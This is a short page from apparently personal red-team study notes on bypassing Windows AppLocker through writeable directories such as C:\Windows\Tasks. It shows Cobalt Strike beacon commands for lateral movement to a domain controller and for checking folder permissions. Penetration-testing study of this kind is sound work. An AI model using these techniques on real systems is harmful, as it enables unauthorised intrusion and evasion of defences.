What is this changing
Notes
NotesSome other stuff
test
Notes
NotesSome other stuff
  • Mixing...
  • General
    • Transferring Files
      • Serving Your Files
      • Transferring Files To Linux
      • Transferring Files To Windows
    • File Types
      • .vhd
    • Password Cracking
      • Hashcat
        • Wordlists
        • Wordlist + Rules
        • Masks
        • Mask Files
        • Combinator
        • Hybrid
        • Keyboard Walks
    • Trash to sift through
      • Cookie 3.1.24.ctd
  • OSINT
  • Enumeration
  • Web Applications
    • Web Vulnerabilities
      • Web App Red Team Checklist
      • SSRF (Server Side Request Forgery)
      • Blind Data Exfiltration via DNS
      • XSS
      • XXE
      • XPath Injection
    • APIs
      • Web API Indicators
      • Passive Reconnaissance
      • Active API Reconnaissance
  • Active Directory
    • Reconnaissance
      • PowerView
      • SharpView
      • ADSearch
    • User Impersonation
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • Token Impersonation
      • Token Store
      • Make Token
      • Process Injection
    • Lateral Movement
      • Windows Remote Management
      • PsExec
      • Windows Management Instrumentation (WMI)
      • CoInitializeSecurity
      • DCOM
    • Kerberos
      • Kerberoasting
      • ASREP Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • S4U2Self Abuse
      • Resource-Based Constrained Delegation
      • Shadow Credentials
      • Kerberos Relay Attacks
    • Pivoting
      • SOCKS Proxies
      • Linux Tools For Proxies
      • Windows Tools For Proxies
      • Pivoting with Kerberos
      • Pivoting A Browser
      • Reverse Port Forwards
      • NTLM Relaying
      • Relaying WebDAV
    • AD Certificate Services
      • Find Certificate Authorities
      • Misconfigured Certificate Templates
      • NTLM Relaying to ADCS HTTP Endpoints
      • User & Computer Persistence
    • Group Policy
      • Modify Existing GPO
      • Create & Link a GPO
    • MS SQL Servers
      • MS SQL Impersonation
      • MS SQL Command Execution
      • MS SQL Lateral Movement
      • MS SQL Privilege Escalation
    • Configuration Manager
      • Enumeration
      • Network Access Account Credentials
      • Lateral Movement
    • Domain Dominance
      • Silver Tickets
      • Golden Ticket
      • Diamond Tickets
      • Forged Certificates
    • Forest & Domain Trusts
      • Parent/Child
      • One-Way Inbound
      • One-Way Outbound
    • LAPS (Local Administrator Password Solution)
      • Reading ms-Mcs-AdmPwd
      • Password Expiration Protection
      • LAPS Backdoors
  • Report Writing
    • Wireless Pentesting
  • Cobalt Strike
    • Starting
      • Start CS as a Service
      • Listener Management
      • Generating Payloads
      • Pivot Listeners
    • Take Screenshot
    • Mimikatz
      • NTLM Hashes
      • Kerberos Encryption Keys
      • Security Account Manager
      • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
    • Session Passing
      • Beacon Passing
      • Foreign Listener
      • Spawn & Inject
    • Credentials
      • Credential Manager
      • Scheduled Task Credentials
    • Evading Windows Defender
      • Artifact Kit
      • Malleable C2
      • Resource Kit
      • AMSI vs Post-Exploitation
      • Manual AMSI Bypasses
      • Behavioural Detections
      • Parent/Child Relationships
      • Command Line Detections
    • Application Whitelisting
      • Policy Enumeration
      • Writeable Paths
      • Binaries, Scripts, and Libraries
      • PowerShell CLM
      • Beacon DLL
Powered by GitBook
On this page
Edit on GitHub

Last updated 11 hours ago

The default rules allow execution from anywhere within C:\Program Files and C:\Windows (including subdirectories). Moving laterally to a protected machine via psexec is trivial, because the service executable is written into C:\Windows.

If you're on a protected machine as a standard user, there are several directories within C:\Windows that are writeable. One such example is C:\Windows\Tasks. This would allow us to copy an executable into this directory and run it.

When enumerating the rules, you may also find additional weak rules that system administrators have put in. This is an example of a rule I've genuinely seen in production:

beacon> jump psexec64 dc.dev-studio.com smb
Started service b8f5313 on dc.dev-studio.com
[+] established link to child beacon: 10.10.150.10
beacon> powershell Get-Acl C:\Windows\Tasks | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Windows\Tasks
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow  268435456
         NT AUTHORITY\Authenticated Users Allow  CreateFiles, ReadAndExecute, Synchronize    <---
         NT AUTHORITY\SYSTEM Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Administrators Allow  FullControl
Audit  : 
Sddl   : O:SYG:SYD:PAI(A;OICIIO;GA;;;CO)(A;;0x1200ab;;;AU)(A;OICIIO;GA;;;SY)(A;;FA;;;SY)(A;OICIIO;GA;;;BA)(A;;FA;;;BA)
<FilePathCondition Path="*\AppV\*"/>
PreviousPolicy EnumerationNextBinaries, Scripts, and Libraries
  1. Cobalt Strike
  2. Application Whitelisting

Writeable Paths